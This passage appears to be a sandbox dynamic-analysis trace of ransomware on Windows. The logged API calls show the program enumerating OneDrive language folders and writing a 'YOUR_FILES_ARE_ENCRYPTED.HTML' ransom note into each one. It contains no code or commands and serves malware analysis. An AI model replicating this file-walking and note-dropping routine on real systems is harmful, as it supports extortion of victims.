ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x10eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.588] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.588] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.588] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.588] lstrlenW (lpString=".mui") returned 4 [0161.588] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.588] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x10eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.588] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.589] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ig-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.589] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.592] CloseHandle (hObject=0x594) returned 1 [0161.592] GetProcessHeap () returned 0x270000 [0161.593] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.593] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="is", cAlternateFileName="")) returned 1 [0161.593] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is") returned 74 [0161.593] GetProcessHeap () returned 0x270000 [0161.593] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.593] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is" [0161.593] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\*" [0161.593] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.786] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.786] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab3a6690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.786] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.786] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.786] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.786] lstrlenW (lpString=".mui") returned 4 [0161.786] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.786] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab3a6690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.786] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.786] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\is\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.798] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.801] CloseHandle (hObject=0x5b8) returned 1 [0161.802] GetProcessHeap () returned 0x270000 [0161.802] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.804] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="it", cAlternateFileName="")) returned 1 [0161.804] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it") returned 74 [0161.805] GetProcessHeap () returned 0x270000 [0161.805] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.806] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it" [0161.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\*" [0161.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.806] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.807] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.807] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.807] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.807] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.807] lstrlenW (lpString=".mui") returned 4 [0161.807] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.807] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.807] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.808] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.808] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.811] CloseHandle (hObject=0x5b8) returned 1 [0161.811] GetProcessHeap () returned 0x270000 [0161.812] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.812] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="iu-latn-ca", cAlternateFileName="IU-LAT~1")) returned 1 [0161.812] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca") returned 82 [0161.812] GetProcessHeap () returned 0x270000 [0161.812] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.812] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca" [0161.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\*" [0161.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.813] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.813] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.813] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\FileSync.LocalizedResources.dll.mui") returned 118 [0161.813] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.813] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.813] lstrlenW (lpString=".mui") returned 4 [0161.813] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.813] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.813] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.813] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0161.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\iu-latn-ca\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.814] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.816] CloseHandle (hObject=0x5b8) returned 1 [0161.817] GetProcessHeap () returned 0x270000 [0161.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.818] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ja", cAlternateFileName="")) returned 1 [0161.818] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja") returned 74 [0161.818] GetProcessHeap () returned 0x270000 [0161.818] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.818] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja" [0161.818] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\*" [0161.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.819] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.819] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.819] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.819] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.819] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.819] lstrlenW (lpString=".mui") returned 4 [0161.819] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.819] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.819] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.819] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 